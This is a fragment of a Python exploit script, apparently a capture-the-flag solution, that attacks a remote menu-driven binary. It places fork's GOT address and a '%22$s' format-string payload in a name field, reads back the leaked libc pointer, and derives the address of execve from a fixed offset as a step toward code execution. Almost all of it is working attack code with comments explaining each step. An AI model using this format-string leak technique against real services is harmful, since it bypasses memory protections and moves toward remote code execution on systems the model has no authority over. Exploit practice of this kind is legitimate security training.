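# Step 1c --- Get the address of execve
#
# Format-string read of fork's GOT slot: the name buffer starts with the raw
# 4-byte address of the slot, and "%22$s" dereferences the 22nd stack argument
# (assumed to land on the start of our buffer -- TODO confirm against the target
# binary) so the server echoes whatever is stored at that slot, i.e. the
# resolved libc address of fork.  ":ENFORK:" is a marker so we know where the
# leaked bytes end.
LEAKFORKADDR = dword_to_bitstring(location_got_fork)
LEAKFORKADDR += "%22$s:ENFORK:"
nc.read_until("Your choice: ")
nc.write("1" + "\n")
nc.read_until("Insert name: ")
# Pad the name to 100 bytes; the trailing bytes presumably populate other fields
# of the record that follows the name (their meaning is not visible here).
nc.write(LEAKFORKADDR + "A" * (100 - len(LEAKFORKADDR)) + "\x01\x01" * 4 + "\xFF\xFF" + "\n")
nc.read_until("Uranium in nuclear plant \"")
# The echoed name is: 4 address bytes, the %s expansion, then the 8-byte marker.
leak = nc.read_until(":ENFORK:")[4:-8]
# %s reads until the first NUL, so the expansion may be shorter than a pointer
# (a 0x00 byte inside the address) or longer (the following GOT slots contained
# no NUL either).  Fail loudly on a short leak instead of feeding garbage into
# bitstring_to_dword, and only ever hand it the first 4 bytes.
if len(leak) < 4:
    raise RuntimeError("fork leak is %d bytes, expected at least 4 (NUL inside the pointer? retry)" % len(leak))
addrfork = bitstring_to_dword(leak[:4])
# Fixed fork -> execve distance.  This is specific to the libc build the
# exploit was written against; recompute it from the target's libc symbols
# whenever the remote libc changes, or the later steps will corrupt memory.
addrexecve = addrfork + 0x320
print("[+] Address of fork : " + hex(addrfork))
print(" > Address of execve : " + hex(addrexecve))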